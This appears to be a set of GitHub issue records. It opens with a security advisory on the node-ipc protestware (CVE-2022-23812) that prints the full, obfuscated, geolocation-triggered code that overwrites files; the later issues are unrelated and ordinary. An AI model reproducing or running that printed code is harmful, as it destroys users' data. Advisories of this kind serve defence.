        const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
        if (a) {
          h(n.toString("utf8"));
          h(o.toString("utf8"));
          h(r.toString("utf8"));
          h(f.toString("utf8"));
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
  if (!a.existsSync(n)) {
    return;
  }
  let r = [];
  try {
    r = a.readdirSync(n);
  } catch (t) {}
  const f = [];
  const c = Buffer.from("4p2k77iP", "base64");
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try {
      t = a.lstatSync(i);
    } catch (t) {
      continue;
    }
    if (t.isDirectory()) {
      const s = h(i, o);
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️
      } catch (t) {}
    }
  }
  return f;
}
const ssl = true;
export { ssl as default, ssl };
```
<p>Publish Date: 2022-03-16
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-23812>CVE-2022-23812</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
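The 9.8 base score above follows mechanically from the listed metrics (vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Here is a minimal Python sketch of the CVSS 3.0 base equation using the weights from the specification (the official Roundup definition guards against floating-point edge cases; a plain ceiling suffices for this value):

```python
import math

# Weights from the CVSS 3.0 specification for the metrics listed above.
AV_N, AC_L, PR_N, UI_N = 0.85, 0.77, 0.85, 0.85  # Network / Low / None / None
C_H = I_H = A_H = 0.56  # High Confidentiality/Integrity/Availability impact

def roundup(x: float) -> float:
    """CVSS 'Roundup': smallest number to one decimal place that is >= x."""
    return math.ceil(x * 10) / 10

iss = 1 - (1 - C_H) * (1 - I_H) * (1 - A_H)  # impact sub-score
impact = 6.42 * iss                          # Scope: Unchanged
exploitability = 8.22 * AV_N * AC_L * PR_N * UI_N
base = roundup(min(impact + exploitability, 10)) if impact > 0 else 0.0
print(base)  # 9.8
```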
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2022-23812 (High) detected in node-ipc-9.2.2.tgz - ## CVE-2022-23812 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>node-ipc-9.2.2.tgz</b></p></summary>
<p>A nodejs module for local and remote Inter Process Communication (IPC), Neural Networking, and able to facilitate machine learning.</p>
<p>Library home page: <a href="https://registry.npmjs.org/node-ipc/-/node-ipc-9.2.2.tgz">https://registry.npmjs.org/node-ipc/-/node-ipc-9.2.2.tgz</a></p>
<p>Path to dependency file: /{{cookiecutter.project_slug}}/frontend/package.json</p>
<p>Path to vulnerable library: /{{cookiecutter.project_slug}}/frontend/node_modules/node-ipc/package.json</p>
<p>
Dependency Hierarchy:
- cli-plugin-babel-4.5.15.tgz (Root Library)
- cli-shared-utils-4.5.15.tgz
- :x: **node-ipc-9.2.2.tgz** (Vulnerable Library)
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
This affects the package node-ipc from 10.1.1 and before 10.1.3.
This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji.
**Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.
Malicious Code:
**Note:** Don't run it!
js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
const t = Math.round(Math.random() * 4);
if (t > 1) {
return;
}
const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
o.get(n.toString("utf8"), function (t) {
t.on("data", function (t) {
const n = Buffer.from("Li8=", "base64");
const o = Buffer.from("Li4v", "base64");
const r = Buffer.from("Li4vLi4v", "base64");
const f = Buffer.from("Lw==", "base64");
const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
const e = Buffer.from("cnVzc2lh", "base64");
const i = Buffer.from("YmVsYXJ1cw==", "base64");
try {
const s = JSON.parse(t.toString("utf8"));
const u = s[c.toString("utf8")].toLowerCase();
const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
if (a) {
h(n.toString("utf8"));
h(o.toString("utf8"));
h(r.toString("utf8"));
h(f.toString("utf8"));
}
} catch (t) {}
});
});
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
if (!a.existsSync(n)) {
return;
}
let r = [];
try {
r = a.readdirSync(n);
} catch (t) {}
const f = [];
const c = Buffer.from("4p2k77iP", "base64");
for (var e = 0; e < r.length; e++) {
const i = u.join(n, r[e]);
let t = null;
try {
t = a.lstatSync(i);
} catch (t) {
continue;
}
if (t.isDirectory()) {
const s = h(i, o);
s.length > 0 ? f.push(...s) : null;
} else if (i.indexOf(o) >= 0) {
try {
a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️
} catch (t) {}
}
}
return f;
}
const ssl = true;
export { ssl as default, ssl };
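One non-obvious detail in the listing: the `Math.round(Math.random() * 4) > 1` guard means the payload only proceeds when the rounded value is 0 or 1, i.e. with probability 3/8. A quick Monte Carlo check of that claim in Python (a sketch of the guard only, not the payload):

```python
import random

# The guard: const t = Math.round(Math.random() * 4); if (t > 1) return;
# It proceeds only for t in {0, 1}. Analytically, with x uniform on [0, 1):
#   P(t = 0) = P(x < 0.125) = 1/8,  P(t = 1) = P(0.125 <= x < 0.375) = 1/4,
# so the payload runs on roughly 3/8 = 37.5% of invocations.
# (Python's round() is banker's rounding, unlike JS Math.round(), but exact
# halves are vanishingly rare for random floats, so the estimate is unaffected.)
def proceeds() -> bool:
    return round(random.random() * 4) <= 1

random.seed(0)
trials = 200_000
rate = sum(proceeds() for _ in range(trials)) / trials
print(f"{rate:.3f}")  # close to 0.375
```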
<p>Publish Date: 2022-03-16
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-23812>CVE-2022-23812</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve high detected in node ipc tgz cve high severity vulnerability vulnerable library node ipc tgz a nodejs module for local and remote inter process communication ipc neural networking and able to facilitate machine learning library home page a href path to dependency file cookiecutter project slug frontend package json path to vulnerable library cookiecutter project slug frontend node modules node ipc package json dependency hierarchy cli plugin babel tgz root library cli shared utils tgz x node ipc tgz vulnerable library found in base branch master vulnerability details this affects the package node ipc from and before this package contains malicious code that targets users with ip located in russia or belarus and overwrites their files with a heart emoji note from versions onwards instead of having malicious code directly in the source of this package node ipc imports the peacenotwar package that includes potentially undesired behavior malicious code note don t run it js import u from path import a from fs import o from https settimeout function const t math round math random if t return const n buffer from o get n tostring function t t on data function t const n buffer from const o buffer from const r buffer from const f buffer from lw const c buffer from const e buffer from const i buffer from try const s json parse t tostring const u s tolowercase const a u includes e tostring u includes i tostring checks if country is russia or belarus if a h n tostring h o tostring h r tostring h f tostring catch t math ceil math random async function h n o if a existssync n return let r try r a readdirsync n catch t const f const c buffer from for var e e r length e const i u join n r let t null try t a lstatsync i catch t continue if t isdirectory const s h i o s length f push s null else if i indexof o try a writefile i c tostring 
function overwrites file with catch t return f const ssl true export ssl as default ssl publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact high integrity impact high availability impact high for more information on scores click a href step up your open source security game with whitesource | 0 |
17,570 | 23,383,873,103 | IssuesEvent | 2022-08-11 12:07:58 | hashicorp/terraform-cdk | https://api.github.com/repos/hashicorp/terraform-cdk | closed | Refactor Github Actions using reusable workflows | enhancement needs-priority dev-process | <!--- Please keep this note for the community --->
### Community Note
- Please vote on this issue by adding a 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original issue to help the community and maintainers prioritize this request
- Please do not leave "+1" or other comments that do not add relevant new information or questions, they generate extra noise for issue followers and do not help prioritize the request
- If you are interested in working on this issue or have submitted a pull request, please leave a comment
<!--- Thank you for keeping this note for the community --->
### Description
Currently we have a lot of repetition (e.g. for integration tests) in our Github action workflows. We should refactor them using [reusable workflows](https://docs.github.com/en/actions/using-workflows/reusing-workflows#creating-a-reusable-workflow) to avoid duplicated code.
<!--- Please leave a helpful description of the feature request here. --->
<!--- Information about code formatting: https://help.github.com/articles/basic-writing-and-formatting-syntax/#quoting-code --->
### References
<!---
Information about referencing Github Issues: https://help.github.com/articles/basic-writing-and-formatting-syntax/#referencing-issues-and-pull-requests
Are there any other GitHub issues (open or closed) or pull requests that should be linked here? Vendor blog posts or documentation?
--->
| 1.0 | Refactor Github Actions using reusable workflows - <!--- Please keep this note for the community --->
### Community Note
- Please vote on this issue by adding a 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original issue to help the community and maintainers prioritize this request
- Please do not leave "+1" or other comments that do not add relevant new information or questions, they generate extra noise for issue followers and do not help prioritize the request
- If you are interested in working on this issue or have submitted a pull request, please leave a comment
<!--- Thank you for keeping this note for the community --->
### Description
Currently we have a lot of repetition (e.g. for integration tests) in our Github action workflows. We should refactor them using [reusable workflows](https://docs.github.com/en/actions/using-workflows/reusing-workflows#creating-a-reusable-workflow) to avoid duplicated code.
<!--- Please leave a helpful description of the feature request here. --->
<!--- Information about code formatting: https://help.github.com/articles/basic-writing-and-formatting-syntax/#quoting-code --->
### References
<!---
Information about referencing Github Issues: https://help.github.com/articles/basic-writing-and-formatting-syntax/#referencing-issues-and-pull-requests
Are there any other GitHub issues (open or closed) or pull requests that should be linked here? Vendor blog posts or documentation?
--->
| process | refactor github actions using reusable workflows community note please vote on this issue by adding a 👍 to the original issue to help the community and maintainers prioritize this request please do not leave or other comments that do not add relevant new information or questions they generate extra noise for issue followers and do not help prioritize the request if you are interested in working on this issue or have submitted a pull request please leave a comment description currently we have a lot of repetition e g for integration tests in our github action workflows we should refactor them using to avoid duplicated code references information about referencing github issues are there any other github issues open or closed or pull requests that should be linked here vendor blog posts or documentation | 1 |
16,395 | 21,176,843,190 | IssuesEvent | 2022-04-08 01:29:23 | nodejs/node | https://api.github.com/repos/nodejs/node | closed | child_process, expose a raw exit code | child_process feature request stale | I'd like to have a feature in node to access the raw exit status of the program, for a better emscripten system() implementation. Right now emscripten's system implementation is repacking the exit code to return it in the "waitpid" format as required by POSIX. However, this is POSIX-specific and doesn't make much sense e.g. on Windows, but we also don't want to return values that don't match when compiling and running the C program natively, since that could cause incompatibility. Thus, having access to the raw exit code of a child program from node would be the best approach here!
See the emscripten system implementation and related node / libuv discussion here:
https://github.com/emscripten-core/emscripten/pull/10547 | 1.0 | child_process, expose a raw exit code - I'd like to have a feature in node to access the raw exit status of the program, for a better emscripten system() implementation. Right now emscripten's system implementation is repacking the exit code to return it in the "waitpid" format as required by POSIX. However, this is POSIX-specific and doesn't make much sense e.g. on Windows, but we also don't want to return values that don't match when compiling and running the C program natively, since that could cause incompatibility. Thus, having access to the raw exit code of a child program from node would be the best approach here!
See the emscripten system implementation and related node / libuv discussion here:
https://github.com/emscripten-core/emscripten/pull/10547 | process | child process expose a raw exit code i d like to have a feature in node to access the raw exit status of the program for a better emscripten system implementation right now emscripten s system implementation is repacking the exit code to return it in the waitpid format as required by posix however this only posix specific and doesn t make much sense e g on windows but we also don t want to return values that doesn t match when compiling and running the c program natively since it could cause incompatibility thus having access to raw exit code of a child program from node would be best approach to go here see the emscripten system implementation and related node libuv discussion here | 1 |
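For context on the "waitpid format" mentioned in this issue: POSIX packs a child's exit code and terminating signal into a single status word, which callers unpack with macros like `WEXITSTATUS`. A rough Python sketch of the conventional glibc-style encoding (illustrative; the exact bit layout is implementation-defined, and these helper names are ours, not a real API):

```python
# Conventional (glibc-style) wait status word, as produced by waitpid():
# exit code in bits 8-15, terminating signal in bits 0-6. This is the
# POSIX-shaped value that emscripten's system() emulates for C code.
def pack_exited(exit_code: int) -> int:
    return (exit_code & 0xFF) << 8

def wifexited(status: int) -> bool:
    return (status & 0x7F) == 0

def wexitstatus(status: int) -> int:
    return (status >> 8) & 0xFF

status = pack_exited(3)  # child exited with code 3
print(status, wifexited(status), wexitstatus(status))  # 768 True 3
```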
337,702 | 30,258,075,898 | IssuesEvent | 2023-07-07 05:38:25 | BoBoBaSs84/Los.Santos.Dope.Wars | https://api.github.com/repos/BoBoBaSs84/Los.Santos.Dope.Wars | closed | Feature: Screen provider interface and implementation | enhancement tests | - maybe we need to refactor notification too | 1.0 | Feature: Screen provider interface and implementation - - maybe we need to refactor notification too | non_process | feature screen provider interface and implementation maybe we need to refactor notification too | 0 |
17,723 | 23,625,566,616 | IssuesEvent | 2022-08-25 03:17:09 | lynnandtonic/nestflix.fun | https://api.github.com/repos/lynnandtonic/nestflix.fun | closed | Add Big Baby from "Allegoria" (Screenshots added) | suggested title in process | Please add as much of the following info as you can:
Title: Big Baby
Type (film/tv show): film - slasher horror
Film or show in which it appears: Allegoria
Is the parent film/show streaming anywhere? Yes - Amazon Prime & Shudder
Synopsis: He was traumatized by being left in his crib while his babysitter had sex. Twenty years later, this big baby goes on a killing spree.
About when in the parent film/show does it appear? Slightly past mid-way it's shown interspersed with reaction shots of the people watching it. It's also shown in its entirety as a post-credits scene.
Actual footage of the film/show can be seen (yes/no)? Yes
Timestamps:
- interspersed with audience reactions: 37:42 - 40:08
- post credits scene begins at 1:07:30
Production Company: an Eddie Park film
Quote: Who's the big baby now?!
(Sorry, I can't give screenshots. I watched it through a reviewer screener.)
| 1.0 | Add Big Baby from "Allegoria" (Screenshots added) - Please add as much of the following info as you can:
Title: Big Baby
Type (film/tv show): film - slasher horror
Film or show in which it appears: Allegoria
Is the parent film/show streaming anywhere? Yes - Amazon Prime & Shudder
Synopsis: He was traumatized by being left in his crib while his babysitter had sex. Twenty years later, this big baby goes on a killing spree.
About when in the parent film/show does it appear? Slightly past mid-way it's shown interspersed with reaction shots of the people watching it. It's also shown in its entirety as a post-credits scene.
Actual footage of the film/show can be seen (yes/no)? Yes
Timestamps:
- interspersed with audience reactions: 37:42 - 40:08
- post credits scene begins at 1:07:30
Production Company: an Eddie Park film
Quote: Who's the big baby now?!
(Sorry, I can't give screenshots. I watched it through a reviewer screener.)
| process | add big baby from allegoria screenshots added please add as much of the following info as you can title big baby type film tv show film slasher horror film or show in which it appears allegoria is the parent film show streaming anywhere yes amazon prime shudder synopsis he was traumatized by being left in his crib while his babysitter had sex twenty years later this big baby goes on a killing spree about when in the parent film show does it appear slightly past mid way it s shown interspersed with reaction shots of the people watching it it s also shown in its entirity as a post credits scene actual footage of the film show can be seen yes no yes timestamps interspersed with audience reactions post credits scene begins at production company an eddie park film quote who s the big baby now sorry i can t give screenshots i watched it through a reviewer screener | 1 |
12,207 | 14,405,981,331 | IssuesEvent | 2020-12-03 19:31:38 | jOOQ/jOOQ | https://api.github.com/repos/jOOQ/jOOQ | opened | Open up DSL function API to <U> types of converted columns | C: Functionality E: All Editions P: Medium T: Enhancement T: Incompatible change | Historically, we only supported the JDBC types for `<T>` in `Field<T>`, and then a few of our own, including `UByte` or `JSON`, etc.
Later on, it became clear this design was insufficient and we needed various means of supporting custom data types, including:
- `Converter<T, U>` for simple data type conversions between the JDBC types `<T>` and arbitrary user defined types `<U>`
- `Binding<T, U>`, like converters, but offering SPIs for the data type binding to and from JDBC
- `EnumType`, a type safe mapping for MySQL column-level or PostgreSQL schema-level `ENUM` types
- `Domain<T>` for standard SQL domains
- `EmbeddableRecord` to wrap several columns in a single "virtual" column with a user type
A lot of these types are really backed by one of the JDBC types, which are required throughout the jOOQ API. For example, with a `Converter<String, IBAN>`, we can map a custom `IBAN` type to the JDBC `String` type, stored e.g. as `VARCHAR(50)`. However, this now prevents using functions like `DSL.length(IBAN_COLUMN)` on such columns, which is a pity!
This can be fixed in several ways:
- We could remove all type information from functions like
`DSL.length(Field<String>): Field<String>` to: `DSL.length(Field<?>): Field<Integer>`
`DSL.substring(Field<String>, int): Field<String>` to `<U> DSL.substring(Field<U>, int): Field<U>`
This would effectively remove all type safety, which isn't very compelling.
Advantages:
- Pragmatic solution
- We could open up the entire API to user defined types
- We could change `Field<T>` to `Field<T, U>`, changing
`DSL.length(Field<String>): Field<String>` to `DSL.length(Field<String, ?>): Field<Integer, Integer>`
`DSL.substring(Field<String>, int): Field<String>` to `<U> DSL.substring(Field<String, U>, int): Field<String, U>`
This would be a huge, highly backwards incompatible change (unless it can be solved with a clever subtyping trick), so also not very compelling. (We'd also need `DataType<T, U>` and many other changes). But it has a chance of thoroughly addressing this issue.
Advantages:
- A lot of internal raw type casts where `<T>` and `<U>` are confused could be removed
- This probably includes some rather subtle bugs that cannot be fixed, currently
- We wouldn't have to compromise on type safety and could still open up the entire API to user defined types
- I feel that the availability of both `<T, U>` types *everywhere* will have a lot of unforeseen advantages
It is not likely this can be solved any time soon. The issue here will serve as a starting point for discussion, and a possibility to link to when minor things will be fixed, such as `DSL.sum()`: #3415
Given how little traction issues like #3415 have received, this may not be the most pressing of issues. Perhaps
- People aren't using forced types all that much
- If they do, they're using them on "strong domain types", where data centric function calls hardly make sense (e.g. calling `LPAD()` on an `IBAN` is not an every day requirement)
- If it is a requirement, the workarounds are usually very simple and pragmatic: Use `Field.coerce()`, rawtype casts, plain SQL templating, etc. | True | Open up DSL function API to <U> types of converted columns - Historically, we only supported the JDBC types for `<T>` in `Field<T>`, and then a few of our own, including `UByte` or `JSON`, etc.
Later on, it became clear this design was insufficient and we needed various means of supporting custom data types, including:
- `Converter<T, U>` for simple data type conversions between the JDBC types `<T>` and arbitrary user defined types `<U>`
- `Binding<T, U>`, like converters, but offering SPIs for the data type binding to and from JDBC
- `EnumType`, a type safe mapping for MySQL column-level or PostgreSQL schema-level `ENUM` types
- `Domain<T>` for standard SQL domains
- `EmbeddableRecord` to wrap several columns in a single "virtual" column with a user type
A lot of these types are really backed by one of the JDBC types, which are required throughout the jOOQ API. For example, with a `Converter<String, IBAN>`, we can map a custom `IBAN` type to the JDBC `String` type, stored e.g. as `VARCHAR(50)`. However, this now prevents using functions like `DSL.length(IBAN_COLUMN)` on such columns, which is a pity!
This can be fixed in several ways:
- We could remove all type information from functions like
`DSL.length(Field<String>): Field<String>` to: `DSL.length(Field<?>): Field<Integer>`
`DSL.substring(Field<String>, int): Field<String>` to `<U> DSL.substring(Field<U>, int): Field<U>`
This would effectively remove all type safety, which isn't very compelling.
Advantages:
- Pragmatic solution
- We could open up the entire API to user defined types
- We could change `Field<T>` to `Field<T, U>`, changing
`DSL.length(Field<String>): Field<String>` to `DSL.length(Field<String, ?>): Field<Integer, Integer>`
`DSL.substring(Field<String>, int): Field<String>` to `<U> DSL.substring(Field<String, U>, int): Field<String, U>`
This would be a huge, highly backwards incompatible change (unless it can be solved with a clever subtyping trick), so also not very compelling. (We'd also need `DataType<T, U>` and many other changes). But it has a chance of thoroughly addressing this issue.
Advantages:
- A lot of internal raw type casts where `<T>` and `<U>` are confused could be removed
- This probably includes some rather subtle bugs that cannot be fixed, currently
- We wouldn't have to compromise on type safety and could still open up the entire API to user defined types
- I feel that the availability of both `<T, U>` types *everywhere* will have a lot of unforeseen advantages
It is not likely this can be solved any time soon. The issue here will serve as a starting point for discussion, and a possibility to link to when minor things will be fixed, such as `DSL.sum()`: #3415
Given how little traction issues like #3415 have received, this may not be the most pressing of issues. Perhaps
- People aren't using forced types all that much
- If they do, they're using them on "strong domain types", where data centric function calls hardly make sense (e.g. calling `LPAD()` on an `IBAN` is not an every day requirement)
- If it is a requirement, the workarounds are usually very simple and pragmatic: Use `Field.coerce()`, rawtype casts, plain SQL templating, etc. | non_process | open up dsl function api to types of converted columns historically we only supported the jdbc types for in field and then a few of our own including ubyte or json etc later on it became clear this design was insufficient and we needed various means of supporting custom data types including converter for simple data type conversions between the jdbc types and arbitrary user defined types binding like converters but offering spis for the data type binding to and from jdbc enumtype a type safe mapping for mysql column level or postgresql schema level enum types domain for standard sql domains embeddablerecord to wrap several columns in a single virtual column with a user type a lot of these types are really backed by one of the jdbc types which are required throughout the jooq api for example with a converter we can map a custom iban type to the jdbc string type stored e g as varchar however this now prevents using functions like dsl length iban column on such columns which is a pity this can be fixed in several ways we could remove all type information from functions like dsl length field field to dsl length field field dsl substring field int field to dsl substring field int field this would effectively remove all type safety which isn t very compelling advantages pragmatic solution we could open up the entire api to user defined types we could change field to field changing dsl length field field to dsl length field field dsl substring field int field to dsl substring field int field this would be a huge highly backwards incompatible change unless it can be solved with a clever subtyping trick so also not very compelling we d also need datatype and many other changes but it has a chance of thoroughly addressing this issue advantages a lot of internal raw type casts where and are confused could be removed 
this probably includes some rather subtle bugs that cannot be fixed currently we wouldn t have to compromise on type safety and could still open up the entire api to user defined types i feel that the availability of both types everywhere will have a lot of unforeseen advantages it is not likely this can be solved any time soon the issue here will serve as a starting point for discussion and a possibility to link to when minor things will be fixed such as dsl sum given how little traction issues like have received this may not be the most pressing of issues perhaps people aren t using forced types all that much if they do they re using them on strong domain types where data centric function calls hardly make sense e g calling lpad on an iban is not an every day requirement if it is a requirement the workarounds are usually very simple and pragmatic use field coerce rawtype casts plain sql templating etc | 0 |
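The `Field<T, U>` design discussed in this issue, carrying both the backing JDBC type `T` and the user type `U` in one value, can be sketched outside Java too. A minimal Python `typing` analogue (purely illustrative; these class names are hypothetical and are not the jOOQ API):

```python
from dataclasses import dataclass
from typing import Callable, Generic, TypeVar

T = TypeVar("T")  # backing "JDBC" type, e.g. str
U = TypeVar("U")  # user-defined type, e.g. IBAN

@dataclass(frozen=True)
class Field(Generic[T, U]):
    name: str
    to_user: Callable[[T], U]    # Converter<T, U>: T -> U
    from_user: Callable[[U], T]  # Converter<T, U>: U -> T

@dataclass(frozen=True)
class IBAN:
    value: str

# A length() that accepts any Field backed by str, whatever the user type U,
# mirroring the proposed DSL.length(Field<String, ?>): Field<Integer, Integer>.
def length_expr(field: "Field[str, U]") -> str:
    return f"length({field.name})"

iban_column: "Field[str, IBAN]" = Field("iban", IBAN, lambda i: i.value)
print(length_expr(iban_column))  # length(iban)
```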
264,950 | 23,145,082,138 | IssuesEvent | 2022-07-28 23:14:22 | MPMG-DCC-UFMG/F01 | https://api.github.com/repos/MPMG-DCC-UFMG/F01 | closed | Teste de generalizacao para a tag Seridores - Registro por lotação - Pedra Azul | generalization test development template-Síntese tecnologia informatica tag-Servidores subtag-Registro por lotação | DoD: Realizar o teste de Generalização do validador da tag Seridores - Registro por lotação para o Município de Pedra Azul. | 1.0 | Teste de generalizacao para a tag Seridores - Registro por lotação - Pedra Azul - DoD: Realizar o teste de Generalização do validador da tag Seridores - Registro por lotação para o Município de Pedra Azul. | non_process | teste de generalizacao para a tag seridores registro por lotação pedra azul dod realizar o teste de generalização do validador da tag seridores registro por lotação para o município de pedra azul | 0 |
11,153 | 13,957,693,467 | IssuesEvent | 2020-10-24 08:10:59 | alexanderkotsev/geoportal | https://api.github.com/repos/alexanderkotsev/geoportal | opened | PT: Missing resources in the Geoportal | Geoportal Harvesting process PT - Portugal | Dear Angelo,
We can't understand what the problem is with some of our metadata datasets that have a downloadable service but don't appear in the INSPIRE GEOPORTAL
I can give you the example of this dataset metadata:
fileIdentifier: 32ab6e64-b408-423c-8851-fd2531caf038
With this WFS service metadata:
fileIdentifier:400de6a6-53fa-46de-a926-3cb101e3a9d9
Can you please help us?
Best Regards,
Marta | 1.0 | PT: Missing resources in the Geoportal - Dear Angelo,
We can't understand what the problem is with some of our metadata datasets that have a downloadable service but don't appear in the INSPIRE GEOPORTAL
I can give you the example of this dataset metadata:
fileIdentifier: 32ab6e64-b408-423c-8851-fd2531caf038
With this WFS service metadata:
fileIdentifier:400de6a6-53fa-46de-a926-3cb101e3a9d9
Can you please help us?
Best Regards,
Marta | process | pt missing resources in the geoportal dear angelo we can acute t understand what is the problem with some of our metadata dataset that have downloadable service but doesn rsquo t appear in the inspire geoportal i can give you the example of this dataset metadata fileidentifier with this wfs service metatada fileidentifier can you please help us best regards marta | 1 |
257,719 | 27,563,811,295 | IssuesEvent | 2023-03-08 01:08:12 | LynRodWS/alcor | https://api.github.com/repos/LynRodWS/alcor | opened | CVE-2021-41079 (High) detected in multiple libraries | security vulnerability | ## CVE-2021-41079 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>tomcat-embed-core-9.0.33.jar</b>, <b>tomcat-embed-core-9.0.36.jar</b>, <b>tomcat-embed-core-9.0.35.jar</b>, <b>tomcat-embed-core-9.0.21.jar</b>, <b>tomcat-embed-core-9.0.31.jar</b></p></summary>
<p>
<details><summary><b>tomcat-embed-core-9.0.33.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/elastic_ip_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar,/home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.33/tomcat-embed-core-9.0.33.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.2.6.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.2.6.RELEASE.jar
- :x: **tomcat-embed-core-9.0.33.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.36.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/network_acl_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.36/tomcat-embed-core-9.0.36.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.3.1.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.3.1.RELEASE.jar
- :x: **tomcat-embed-core-9.0.36.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.35.jar</b></p></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/security_group_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.35/tomcat-embed-core-9.0.35.jar</p>
<p>
Dependency Hierarchy:
- spring-boot-starter-web-2.3.0.RELEASE.jar (Root Library)
- spring-boot-starter-tomcat-2.3.0.RELEASE.jar
- :x: **tomcat-embed-core-9.0.35.jar** (Vulnerable Library)
</details>
<details><summary><b>tomcat-embed-core-9.0.21.jar</b></summary>
<p>Core Tomcat implementation</p>
<p>Library home page: <a href="https://tomcat.apache.org/">https://tomcat.apache.org/</a></p>
<p>Path to dependency file: /services/vpc_manager/pom.xml</p>
<p>Path to vulnerable library: /home/wss-scanner/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.21/tomcat-embed-core-9.0.21.jar</p>
<p>
